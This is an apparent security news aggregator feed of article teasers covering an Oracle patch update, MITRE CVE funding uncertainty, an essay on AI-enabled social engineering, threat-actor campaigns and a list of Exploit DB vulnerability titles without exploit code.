In healthcare, safeguarding sensitive data and ensuring device authentication is crucial. Effective Certificate Lifecycle Management (CLM) prevents breaches, supports compliance, and builds resilience against emerging threats like quantum computing. Sectigo’s digital identity solutions help healthcare organizations automate certificate management, enhance security, and prepare for a quantum-safe future.

by Sectigo

Obfuscation techniques have changing since generative AI became widely available.

by ThreatDown

Oracle addresses 171 CVEs in its second quarterly update of 2025 with 378 patches, including 40 critical updates.BackgroundOn April 15, Oracle released its Critical Patch Update (CPU) for April 2025, the second quarterly update of the year. This CPU contains fixes for 171 unique CVEs in 378 security updates across 32 Oracle product families. Out of the 378 security updates published this quarter, 10.6% of patches were assigned a critical severity. Medium severity patches accounted for the bulk of security patches at 54.5%, followed by high severity patches at 32.3%.This quarter’s update includes 40 critical patches across 15 CVEs.SeverityIssues PatchedCVEsCritical4015High12252Medium20698Low106Total378171AnalysisThis quarter, the Oracle SQL Developer product family contained the highest number of patches at 103, accounting for 27.3% of the total patches, followed by Oracle Hyperion at 43 patches, which accounted for 11.4% of the total patches.A full breakdown of the patches for this quarter can be seen in the following table, which also includes a count of vulnerabilities that can be exploited over a network without authentication.Oracle Product FamilyNumber of PatchesRemote Exploit without AuthOracle SQL Developer10382Oracle Hyperion432Oracle Secure Backup4235Oracle Communications3422Oracle E-Business Suite3126Oracle Commerce1611Oracle Enterprise Manager1511Oracle JD Edwards1111Oracle Hospitality Applications85Oracle Database Server73Oracle TimesTen In-Memory Database76Oracle REST Data Services65Oracle Analytics65Oracle Essbase42Oracle Communications Applications44Oracle Insurance Applications41Oracle MySQL42Oracle Policy Automation44Oracle Construction and Engineering32Oracle Financial Services Applications32Oracle Food and Beverage Applications32Oracle Java SE33Oracle PeopleSoft32Oracle Supply Chain30Oracle NoSQL Database22Oracle Retail Applications20Oracle Siebel CRM22Oracle Application Express11Oracle Autonomous Health Framework10Oracle GoldenGate11Oracle Graph Server and Client10Oracle Fusion Middleware11SolutionCustomers are advised to apply all relevant patches in this quarter’s CPU. Please refer to the April 2025 advisory for full details.Identifying affected systemsA list of Tenable plugins to identify these vulnerabilities will appear here as they’re released. This link uses a search filter to ensure that all matching plugin coverage will appear as it is released.Get more informationOracle Critical Patch Update Advisory - April 2025Oracle April 2025 Critical Patch Update Risk MatricesOracle Advisory to CVE MapJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

Conventional wisdom is that AI developers are close to exhausting all the data available for model training. Here''s why that isn''t necessarily the case.

by ITPro Today

Linux communities are at the heart of AI innovation, contributing to open source frameworks, optimizing hardware acceleration, and fostering global collaboration.

by ITPro Today

A new era of U.S. federal AI policy is shifting public service delivery from human-led agencies to commercially developed AI systems, raising urgent questions.

by ITPro Today

In a world of growing data volume and diversity, protecting and keeping track of your organization’s sensitive information is increasingly complex – particularly when 63% of breaches stem from malicious insiders or human error. This blog explores how security teams can achieve visibility beyond the limits of data classification, without adding to the burden of data management.

by Darktrace

by Hack The Box Blog

By Associate Professor Dr. Sheeba Armoogum, University of Mauritius In 2025, the paradigms of human hacking are undergoing a substantial transformation due to the influence of artificial intelligence (AI). While traditional social engineering tactics exploit the psychological vulnerabilities inherent in individuals, AI-driven human hacking introduces a markedly more sophisticated methodology that not only manipulates human behavior but also automates and scales this manipulation to previously unimaginable extents. AI transcends simple replication of human behavior; it adapts to it, assimilates knowledge from it, and tailors its attacks to each individual in real-time, thereby rendering traditional social engineering techniques obsolete in terms of efficiency and effectiveness. The manipulation of individuals through AI goes beyond merely imitating authoritative figures or simply exploiting trust. It uses advanced AI capabilities, such as machine learning, natural language processing, and complex data analytics, to mislead, control, and influence human behavior. The rise of AI-enhanced attacks signifies a significant evolution in the strategies used by cybercriminals to exploit human vulnerabilities, thus presenting a considerable challenge to traditional cybersecurity measures that depend on human intuition and behavioral patterns. The Mechanism of AI-Driven Human Hacking Fundamentally, AI-driven human manipulation uses machine learning algorithms to analyze extensive datasets, identify patterns, and predict human behavior with exceptional precision. These systems do not rely exclusively on pre-established scripts or anticipated psychological triggers; instead, they perpetually adapt, learn, and evolve, which substantially enhances their resistance to detection and countermeasures. AI is transforming the dynamics of human hacking by: Hyper-Personalized Manipulation: Traditional social engineering tactics often rely on broad approaches, such as phishing emails or misleading phone calls, which exploit common psychological tendencies like trust and fear. However, the rise of AI significantly enhances the capability to personalize these tactics to extraordinary degrees. By utilizing data mining techniques, machine learning algorithms can analyze an individual’s online activities, preferences, social media interactions, and professional histories, crafting messages or actions that appear remarkably relevant to that person. This advanced hyper-personalization creates a strong sense of authenticity, making the attack nearly indistinguishable from a legitimate request or interaction. AI systems can collect data from social media to determine a person''s hobbies, job titles, recent activities, and personal connections. With this information, cybercriminals can create highly personalized phishing emails that correspond with the individual’s circumstances, such as a message from a manager about a recently discussed project or an alert from a service provider featuring a customized offer based on recent purchases. As a result, these communications appear both credible and urgent, significantly increasing the likelihood that the scam will deceive the target. Automated Conversations and Behavioral Mimicry: AI has advanced to engage in dynamic and continuous dialogues, closely emulating human behavior with remarkable precision. By analyzing patterns in written text or spoken language, AI models can replicate an individual’s writing style, tone, and emotional cues including urgency, empathy, and informality. This advancement enables cybercriminals to exploit chatbots or voice assistants that can conduct conversations that appear both natural and credible. In voice phishing, commonly referred to as "" vishing"" or AI-generated voice deepfakes, AI algorithms analyze extensive audio recordings of an individual’s voice, resulting in remarkably accurate replication. Attackers can then impersonate trusted individuals, such as corporate executives or family members, using this synthesized voice to request sensitive information or execute financial transactions. These AI-driven interactions are indistinguishable from genuine human communication, presenting an unprecedented challenge to traditional verification methods. Predictive Human Behavior Modeling: Machine learning algorithms utilize static datasets and dynamic, real-time information. By analyzing individuals'' actions and responses during interactions, AI systems can anticipate the likely behaviors of subjects and adapt their approaches accordingly. This predictive capability enables attackers to manipulate the trajectory of conversations or interactions based on the emotional or cognitive states of those involved. For example, suppose an attacker recognizes that an individual tends to respond positively to feelings of urgency or fear. In that case, they can continuously adjust the content of a message or the timing of a phone call to align with the victim’s emotional state. AI can even analyze social media posts, online activities, and past conversations to identify the most advantageous moment to act- either during a particularly stressful time in the victim''s life or when they are more likely to feel distracted or vulnerable. Exploiting Cognitive Biases on a Massive Scale: AI''s true capabilities in influencing human behavior are rooted in its ability to exploit cognitive biases- those automatic, unconscious mental shortcuts individuals use in their decision-making processes. Whether it involves the tendency to trust authority figures, the intrinsic need to reciprocate favors, or the inclination to avoid cognitive dissonance, AI systems can identify and enhance these biases in real time. In a more advanced scenario, attacks driven by AI can engage in “nudging,” a concept that originates from behavioral economics. This approach involves implementing subtle yet significant modifications in the presentation of information, which can influence decision-making processes without the individual being consciously aware of such manipulation. For example, an AI system could formulate a communication that instils a sense of urgency, as exemplified by the statement, “Only 10 slots remain!” This tactic can evoke the recipient’s concern regarding potential loss, commonly referred to as the Fear Of Missing Out (FOMO), thereby compelling them to act impulsively without adequate consideration of the consequences. The Implications of Deepfake Technology and Psychological Manipulation: AI-driven deepfake technologies represent one of the most concerning advancements in human manipulation. Utilizing sophisticated deep learning methodologies, AI systems can produce highly realistic video and audio representations of individuals, thereby enabling cybercriminals to impersonate trustworthy figures with alarming authenticity. Deepfakes technology is particularly adept at circumventing conventional methods of identity verification, as it exploits the inherent trust individuals place in visual and auditory stimuli. Consider a scenario in which a cybercriminal uses a deepfake technology to impersonate a high-ranking company official, sending an employee a message that appears to come directly from the Chief Executive Officer. This deepfake may direct the employee to facilitate the transfer of funds or to grant access to sensitive company information. Given the seemingly genuine nature of the message, the recipient is considerably more inclined to comply, particularly if they have an inherent trust in the individual who appears to be issuing the request. Scalable Attacks: One of the most alarming aspects of AI in the context of human hacking is its capacity for scalability. Traditional social engineering attacks require a significant amount of manual effort to craft individual messages, initiate phone calls, or conduct research on each victim. In contrast, AI has the potential to automate and enhance these activities. By utilizing machine learning algorithms, AI systems can perform thousands, or even millions, of personalized attacks concurrently, effectively targeting individuals across a diverse range of platforms and communication channels, including electronic mail, social media, and voice communication. The substantial magnitude of these AI-driven attacks significantly amplifies the threat. A single attack has the capacity to target a wide range of victims with minimal effort, and the speed at which AI can adapt and enhance its tactics makes it challenging for victims to identify and react to the attack in time. Ethical Implications of AI-Driven Human Hacking The emergence of AI-driven human manipulation prompts significant ethical considerations. While traditional social engineering techniques depend on deception and manipulation, AI introduces a new dimension of complexity and moral ambiguity. The following are some principal ethical concerns: Invasion of Privacy: AI-driven techniques for human manipulation frequently involve the acquisition of extensive personal data from both public and private sources. This situation prompts significant concerns regarding consent, privacy, and the ethical application of personal information. Through the utilization of AI to gather and analyze personal data, attackers can infringe upon an individual''s privacy on an unprecedented scale, often without their knowledge or authorization. Psychological Manipulation: AI can influence over emotions and decision-making processes in ways that are both subtle and powerful. By predicting the responses of individuals to various stimuli, AI systems can guide human behavior without conscious awareness. This situation engenders significant concerns regarding the ethical implications of using AI to exploit human vulnerabilities for harmful purposes. Accountability: As AI becomes more involved in human hacking, the issue of accountability becomes increasingly complex. Who bears the responsibility when an AI system is exploited for malicious purposes? Is it the developers of the AI, the users, or the system itself? As AI systems gain more autonomy, determining liability in cases of AI-driven human hacking could present a considerable legal challenge. Security versus Privacy: An ongoing debate exists regarding the balance between enhancing security measures and safeguarding privacy rights. Techniques associated with AI in human hacking exploit personal data, which can potentially lead to the erosion of privacy rights. However, AI’s ability to strengthen security frameworks and identify vulnerabilities also makes it a valuable tool in cybersecurity. The ethical dilemma lies in using AI responsibly, ensuring it enhances security without compromising individual privacy rights. AI-driven human hacking represents a transformative era in the persistent conflict between cybersecurity and cybercrime. By employing advanced technologies, including machine learning, predictive modeling, and the generation of deepfake content, attackers are capable of manipulating individuals with unprecedented scale and precision. As these threats continue to evolve, it is essential for our understanding of cybersecurity defenses to progress accordingly. We must move beyond traditional tactics and embrace innovative, AI-driven solutions to effectively counter these sophisticated assaults. Simultaneously, it is crucial to address the ethical implications of AI in human hacking, ensuring that privacy, accountability, and human dignity remain paramount in our cybersecurity strategies.

by The Cyber Express

This video showcases leading voices in cybersecurity explaining their examinations into how AI is simultaneously transforming cyber defense and supercharging attacker capabilities. Together, they explored how GenAI is reshaping the threat landscape and what security leaders must do to adapt.

by Bishop Fox

Learn how companies test, train, and benchmarking cybersecurity AI agents with customized CTF competitions.

by Hack The Box Blog

Snyk addresses the recent MITRE CVE funding news, detailing our independent vulnerability data capabilities & commitment to cybersecurity resilience.

by Snyk

A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program -- which is traditionally funded each year by the Department of Homeland Security -- expires on April 16.

by Krebs on Security

Setting up a VPN on your router can give you full coverage for all your devices at home. We''ve found the best routers that support VPN installation or include pre-installed VPN solutions.

by ZDNET Security

If you are in need of a way to improve your online privacy, consider using a VPN. We tested the best free VPNs which offer solid services without invading your privacy or selling your data.

by ZDNET Security

WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection

by Exploit DB

Smart Manager 8.27.0 - Post-Authenticated SQL Injection

by Exploit DB

Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)

by Exploit DB

KodExplorer 4.52 - Open Redirect

by Exploit DB

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

by Exploit DB

Car Rental Project 1.0 - Remote Code Execution

by Exploit DB

Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account

by Exploit DB

Ethercreative Logs 3.0.3 - Path Traversal

by Exploit DB

FLIR AX8 1.46.16 - Remote Command Injection

by Exploit DB

Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass

by Exploit DB

Garage Management System 1.0 (categoriesName) - Stored XSS

by Exploit DB

WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page

by Exploit DB

ProConf 6.0 - Insecure Direct Object Reference (IDOR)

by Exploit DB

phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames

by Exploit DB

ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS

by Exploit DB

ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS

by Exploit DB

ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution

by Exploit DB

ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)

by Exploit DB

Zabbix 7.0.0 - SQL Injection

by Exploit DB

NagVis 1.9.33 - Arbitrary File Read

by Exploit DB

Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)

by Exploit DB

Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)

by Exploit DB

phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)

by Exploit DB

This second part of the blog series continues the path to understanding principals and identities in Google Cloud Platform (GCP) Audit Logs. Part one introduced core concepts around GCP logging, the different identity types, service accounts, authentication methods, and impersonation.

by Mitiga

Learn how Recorded Future''s brand refresh, powered by AI and actionable threat intelligence, helps teams evolve with the next generation of cybersecurity.

by Recorded Future

<p>TrustedSec has achieved CREST Certification for penetration testing, a globally recognized standard that verifies an organization's ability to conduct high-quality, rigorous, and ethical cybersecurity services.</p>

by TrustedSec

The EMEA region is a patchwork of diverse markets, industries, and regulatory environments, and it demands a partner-centric approach. That’s why I joined Cloudflare as VP of EMEA Partnerships.

by Cloudflare

Follow me for lucky prizes scams are old fake crypto exchange scams in a new jacket and on a different platform

by Malwarebytes Labs

Cybercriminals capitalize on tax preparation stress, technology sprawl, and lax communications. Accounting teams can''t afford to treat cybersecurity as an afterthought.

by Dark Reading

Learn more about the January 2025 Patch Tuesday that addresses a critical vulnerability where Kerberos canonicalization flaws allow attackers to bypass Virtualization Based Security and extract protected TGTs from Windows systems. The post CVE-2025-21299 and CVE-2025-29809: Unguarding Microsoft Credential Guard appeared first on NetSPI.

by NetSPI

A lawsuit over the Trump administration’s infamous Houthi Signal group chat has revealed what steps departments took to preserve the messages—and how little they actually saved.

by WIRED Security News

MITRE’s CVE program has been an important pillar in cybersecurity for over two decades. While CISA secured funding on April 16 to extend the program for the next year, the lack of clarity surrounding its long-term future creates great uncertainty about how newly discovered vulnerabilities will be cataloged.Updated Apr 16, 2025: The Cybersecurity and Infrastructure Security Agency (CISA) has stepped in to secure funding for the next year and ensure there will be no lapse in critical CVE services. Additionally, a coalition of CVE Board members have launched the CVE Foundation, a non-profit organization intending to maintain stability and independence of the CVE program.BackgroundOn April 15, reports circulated that the contract for funding the Common Vulnerabilities and Exposures (CVE) program along with other related programs, such as Common Weakness Enumeration (CWE), would be expiring on April 16. The letter below was sent to CVE Board Members and published on social media and other forums announcing the expiration of these programs:The legitimacy of this letter and its contents was confirmed by cybersecurity journalist Brian Krebs in a post on Mastodon. Tenable has also independently confirmed the letter’s legitimacy.CVE program importanceWhile flawed in some ways, the CVE program, which recently celebrated its 25th anniversary, has been an important pillar in cybersecurity for over two decades. It provides a common taxonomy for cybersecurity solutions and organizations to track vulnerabilities and exposures. Since its launch in 1999, the CVE program has published over 250,000 CVEs as of the end of 2024.Risk to CVE programWith the report that the funding for the CVE program is potentially set to expire on April 16, the biggest concern stems from the fact that CVE Numbering Authorities, or CNAs, will no longer be able to reserve and assign CVEs for newly discovered vulnerabilities. While CNAs typically try to reserve a block of CVEs, the lack of transparency surrounding the future of the CVE program creates uncertainty surrounding newly discovered vulnerabilities. The historical CVE database will remain intact on GitHub following the expiration of the CVE program. However, MITRE’s CVE program also provides a centralized repository of CVEs from which many organizations fetch data and this may disappear. The lack of this centralized repository will create difficulties going forward for tracking new and noteworthy vulnerabilities under a common identifier.Tenable’s response to the potential expiration of the MITRE CVE programTenable is closely monitoring the situation surrounding the possible expiration of the CVE program funding.Last year, when we learned about NIST’s National Vulnerability Database (NVD) experiencing delays surrounding analysis efforts, we highlighted that Tenable Vulnerability Management products utilize a diverse range of sources for CVSS scoring and our customers experienced little to no impact.As a provider of vulnerability scanning technology, we are not dependent on the CVE program directly for our vulnerability coverage. We develop our vulnerability coverage against vendor advisories directly, and will continue to do so, so long as vendors make those advisories available whether they contain CVE identifiers or not. Tenable also provides its customers with a richly sourced and curated Vulnerability Intelligence feed that provides contextualized information for any given vulnerability, regardless of a CVE assignment or not.Tenable is a CNA, and we allocate CVEs for our vulnerability disclosures through our Tenable Research Advisories page. We also have reserved a large number of CVE designators for disclosures to ensure the cybersecurity community has clear identity for future discovered vulnerabilities.As new developments surrounding the CVE program emerge, we will update this blog post accordingly.Get more informationMITRE Warns CVE Program Faces Disruption Amid US Funding Uncertainty

by Tenable

The update comes months after Apple pushed its own “inactivity reboot” feature.

by TechCrunch

The remediated flaw gave adversaries a way to maintain access to the app through password resets.

by Dark Reading

Bad bots are becoming increasingly difficult to detect as they more easily mimic human behaviors and utilize evasion techniques, researchers say.

by Dark Reading

Six key areas for cost-effective development of a company's information security function in 2025, with a focus on budget optimization

by Kaspersky

Context Ivanti has disclosed a critical vulnerability, CVE-2025-22457 (CVSS 9.0), affecting multiple product lines including Connect Secure, Policy Secure, and ZTA Gateways. The flaw, a stack-based buffer overflow, allows unauthenticated remote attackers to execute arbitrary code, and has been actively exploited in the wild. Google’s Mandiant team identified threat activity tied to UNC5221, a China-nexus group, which...

by RH-ISAC

Researchers at Abnormal Security said threat actors are using a legitimate presentation and graphic design tool named "Gamma" in phishing attacks.

by Dark Reading

The China-linked threat actor known as UNC5174 has been attributed to a new campaign that leverages a variant of a known malware dubbed SNOWLIGHT and a new open-source tool called VShell to infect Linux systems. ""Threat actors are increasingly using open source tools in their arsenals for cost-effectiveness and obfuscation to save money and, in this case, plausibly blend in with the pool of

by The Hacker News

Though the exact details of the situation have not been confirmed, community infighting seems to have spilled out in a breach of the notorious image board.

by WIRED Security News

A critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain unauthorized access even after a password change. The flaw, assigned the CVE identifier CVE-2025-24859, carries a CVSS score of 10.0, indicating maximum severity. It affects all versions of Roller up to and including 6.1.4.

by The Hacker News

Everybody knows browser extensions are embedded into nearly every user’s daily workflow, from spell checkers to GenAI tools. What most IT and security people don’t know is that browser extensions’ excessive permissions are a growing risk to organizations. LayerX today announced the release of the Enterprise Browser Extension Security Report 2025, This report is the first and only report to merge

by The Hacker News

Cybersecurity researchers have disclosed a malicious package uploaded to the Python Package Index (PyPI) repository that''s designed to reroute trading orders placed on the MEXC cryptocurrency exchange to a malicious server and steal tokens. The package, ccxt-mexc-futures, purports to be an extension built on top of a popular Python library named ccxt (short for CryptoCurrency eXchange Trading),

by The Hacker News

Customer data such as birth dates, credit card numbers, and driver''s license information were stolen when threat actors exploited zero-day vulnerabilities in Cleo-managed file-transfer products.

by Dark Reading

Earlier this year 18-year-old Alan Filion who was sentenced to four years in federal prison for ‘making interstate threats to injure others.’ Alan put himself in this position by conducting 375 ‘swatting’ attacks over the last 18 months.

by Barracuda

Cryptocurrency is slowly becoming a regular way to pay for something, with new uses popping up every day. Many people choose Bitcoin, among others, because it’s easy to use, quick, secure, private, and more affordable than traditional methods. 1. Gaming, Virtual Worlds, and Entertainment If you’re into gaming, Bitcoin is already part of the action, […] The post 9 Modern Ways You Can Use Bitcoin in 2025 appeared first on IT Security Guru.

by IT Security Guru

The infamous website was taken down and working intermittently, while hackers leaked alleged data like moderators email addresses, and source code.

by TechCrunch

Mitre, the operator of the world-renowned CVE repository, has warned of significant impacts to global cyber security standards, and increased risk from threat actors, as it emerges its US government contract will lapse imminently

by ComputerWeekly

Russia-backed APT29''s latest campaign once again uses malicious invites to wine-tasting events as its lure, but this time targets a different set of vintages — errr, victims — and delivers a novel backdoor, GrapeLoader.

by Dark Reading

This new security feature from Google will make your Android phone more difficult to access if you haven''t used it in a while.

by ZDNET Security

Phishing was the most prevalent and disruptive type of attack experienced by UK organizations over the past twelve months, according to the British government’s Cyber Security Breaches Survey 2025.

by KnowBe4

How to make the most of the new features in Sophos Firewall v21.5

by Sophos News

Car rental giant Hertz data suffered a data breach caused by a CL0P ransomware attack on file sharing vendor Cleo

by Malwarebytes Labs

The North Korea-linked threat actor assessed to be behind the massive Bybit hack in February 2025 has been linked to a malicious campaign that targets developers to deliver new stealer malware under the guise of a coding assignment. The activity has been attributed by Palo Alto Networks Unit 42 to a hacking group it tracks as Slow Pisces, which is also known as Jade Sleet, PUKCHONG,

by The Hacker News

Sysdig researchers detailed an ongoing campaign from China-backed threat actor UNC5174, which is using open source hacking tools to stay under the radar.

by Dark Reading

True security isn''t about meeting deadlines — it''s about mitigating risk in a way that aligns with business objectives while protecting against real-world threats.

by Dark Reading

After a year of operating under the radar, the Sysdig Threat Research Team (TRT) identified a new campaign from Chinese... The post UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell appeared first on Sysdig.

by Sysdig

Highlights Introduction Starting in January 2025, Check Point Research (CPR) has been tracking a wave of targeted phishing attacks aimed at European governments and diplomats. The Techniques, Tactics and Procedures (TTPs) observed in this campaign align with the WINELOADER campaigns, which were attributed to APT29, a Russia linked threat group. APT29, also commonly referred to as Midnight Blizzard […] The post Renewed APT29 Phishing Campaign Against European Diplomats appeared first on Check Point Research.

by Check Point Research

by KnowBe4

The cybercrime marketplace is booming, and it’s running at a scale that’s hard to ignore. Today, ransomware-as-a-service, stolen credentials, and even ready-made phishing kits are just a click away on the dark web. Cybercrime has transformed into a well-oiled business ecosystem, with cybercriminals collaborating, innovating, and trading tools like any legitimate industry.  The numbers tell […] The post Cyber Resilience is More Than a Buzzword  appeared first on Binary Defense.

by Binary Defense

Cybersecurity Landscape for New AI Protocols. Security measures should become a growing concern as AI emerges with new technologies and protocols. As we all know, there are 2 new AI protocols introduced by Google and Anthropic: Agent2Agent (A2A) – By Google https://developers.googleblog.com/en/a2a-a-new-era-of-agent-interoperability/ Model Context Protocol (MCP) – By Anthropic https://www.anthropic.com/news/model-context-protocol Organisations are eager to use […] The post Cybersecurity Landscape for New AI Protocols first appeared on BlockAPT.

by BlockAPT